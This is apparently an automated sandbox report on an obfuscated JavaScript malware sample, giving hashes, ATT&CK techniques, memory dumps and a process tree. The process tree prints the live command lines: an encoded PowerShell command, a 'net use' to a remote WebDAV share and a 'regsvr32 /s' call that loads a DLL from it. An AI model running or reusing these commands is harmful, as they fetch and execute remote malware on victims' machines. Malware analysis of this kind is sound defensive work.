27d8e0705ef237521ac45fe9b796def7af69b58825a2ae41de88ef81ee83a9e5

Analysis

max time kernel
13s
max time network
19s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
21-08-2024 15:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

27d8e0705ef237521ac45fe9b796def7af69b58825a2ae41de88ef81ee83a9e5.js
Size

10KB
MD5

d7ec801eb974be2879a17aedece6e4b9
SHA1

296d886b1edce7b3266422bdd82e32106622ca16
SHA256

27d8e0705ef237521ac45fe9b796def7af69b58825a2ae41de88ef81ee83a9e5
SHA512

3fe958e7911d0d02703831aecba83a84ca78e22a71e7e32f6b412f85082fc43a5e2352873e6d2d8ac578f02e64184ca4cdde9681e81899fae3d816b41b3f47af
SSDEEP

192:F9TYiDr4JiZpy6QunRA2p/WXOAmSG+ql2p/WXOAm6YCVz/:F9D0izbnVpwftFpwLr

Score

6^/10

defense_evasion execution

Malware Config

Signatures

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2420	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2420	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1512 wrote to memory of 2420	1512	wscript.exe	30
PID 1512 wrote to memory of 2420	1512	wscript.exe	30
PID 1512 wrote to memory of 2420	1512	wscript.exe	30
PID 2420 wrote to memory of 2828	2420	powershell.exe	32
PID 2420 wrote to memory of 2828	2420	powershell.exe	32
PID 2420 wrote to memory of 2828	2420	powershell.exe	32
PID 2420 wrote to memory of 2132	2420	powershell.exe	33
PID 2420 wrote to memory of 2132	2420	powershell.exe	33
PID 2420 wrote to memory of 2132	2420	powershell.exe	33
PID 2420 wrote to memory of 2132	2420	powershell.exe	33
PID 2420 wrote to memory of 2132	2420	powershell.exe	33

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\27d8e0705ef237521ac45fe9b796def7af69b58825a2ae41de88ef81ee83a9e5.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADEAMQAwADAANwAyADUAOQA5ADAAMgA1ADcAMgA4AC4AZABsAGwA
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\
    3⤵
    PID:2828
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\110072599025728.dll
    3⤵
    PID:2132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2420-4-0x000007FEF531E000-0x000007FEF531F000-memory.dmp

Filesize
4KB

Download
memory/2420-5-0x000000001B210000-0x000000001B4F2000-memory.dmp

Filesize
2.9MB

Download
memory/2420-7-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

Filesize
9.6MB

Download
memory/2420-6-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2420-8-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

Filesize
9.6MB

Download
memory/2420-9-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

Filesize
9.6MB

Download
memory/2420-10-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

Filesize
9.6MB

Download
memory/2420-11-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

Filesize
9.6MB

Download
memory/2420-12-0x000007FEF5060000-0x000007FEF59FD000-memory.dmp

Filesize
9.6MB

Download